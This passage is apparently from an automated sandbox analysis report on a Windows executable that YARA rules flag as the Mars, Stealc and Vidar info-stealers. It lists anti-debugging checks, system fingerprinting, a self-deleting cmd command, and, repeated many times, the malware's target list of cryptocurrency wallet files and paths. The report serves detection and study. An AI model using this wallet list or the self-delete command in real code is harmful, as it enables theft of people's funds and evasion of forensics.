Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00067B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00067B4E
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00066240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00066240
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00065DC0 mov eax, dword ptr fs:[00000030h] 0_2_00065DC0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00064400 GetProcessHeap,HeapAlloc,GetComputerNameA, 0_2_00064400
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00069DC7 SetUnhandledExceptionFilter, 0_2_00069DC7
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00067B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00067B4E
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_000673DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_000673DD
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCFB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CCFB66C
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCFB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CCFB1F7
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CEAAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CEAAC62

HIPS / PFW / Operating System Protection Evasion
barindex
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00065D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00065D00
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\Vk2yYa9dHl.exe" & del "C:\ProgramData\*.dll"" & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5 Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CCFB341 cpuid 0_2_6CCFB341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00064570
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_00064450 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00064450
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_000643C0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_000643C0
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_000644B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_000644B0

Stealing of Sensitive Information
barindex
Yara detected Mars stealer
Source: Yara match File source: Vk2yYa9dHl.exe, type: SAMPLE
Source: Yara match File source: 0.2.Vk2yYa9dHl.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Vk2yYa9dHl.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1753531870.0000000000051000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1633713421.0000000000051000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1754008719.000000000092E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vk2yYa9dHl.exe PID: 7292, type: MEMORYSTR
Source: Yara match File source: decrypted.binstr, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: Vk2yYa9dHl.exe, type: SAMPLE
Source: Yara match File source: 0.2.Vk2yYa9dHl.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Vk2yYa9dHl.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1753531870.0000000000051000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1633713421.0000000000051000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vk2yYa9dHl.exe PID: 7292, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\jaxx\Local Storage\\file__0.localstorage
Source: Vk2yYa9dHl.exe, 00000000.00000002.1754008719.000000000098F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia 